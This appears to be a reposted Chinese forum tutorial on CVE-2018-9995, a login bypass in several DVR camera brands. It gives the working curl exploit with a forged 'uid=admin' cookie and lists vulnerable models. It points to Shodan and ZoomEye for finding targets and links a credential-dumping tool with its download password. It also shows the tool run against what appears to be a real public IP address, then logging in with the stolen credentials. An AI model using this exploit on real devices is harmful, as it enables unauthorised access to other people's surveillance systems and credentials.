cve-2018-9995 dvr登陆绕过漏洞

时间 2019-11-08

标签 cve dvr 登陆绕过漏洞繁體版

原文原文链接

本帖最后由 Snow狼于 2018-6-4 10:27 编辑python

dvr登陆绕过漏洞
此漏洞容许×××者构造一个cookie便可登陆
漏洞语句：curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
测试有此漏洞的dvr：
Novo
CeNovo
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MVDR Login
用shodan查询：
linux

用zoomeye查询：

工具连接：https://pan.baidu.com/s/1X96sJRIwHZcnoBOcWq2CpQ密码：dcoc
依旧是咱们的linux基础命令：
unzip 解压
cd 到文件目录
pip install -r requirements.txt
注意：getDvr为启动脚本下图的红框框

python2.7 getDVR_Credentials.py --host (ip地址) 59.152.178.44 --port (端口) 9000

看红圆圈便是爆出来的密码而后访问那个IP地址填写用户名和密码就能够登入了

这就基本显示出来了晒几张成果图

promise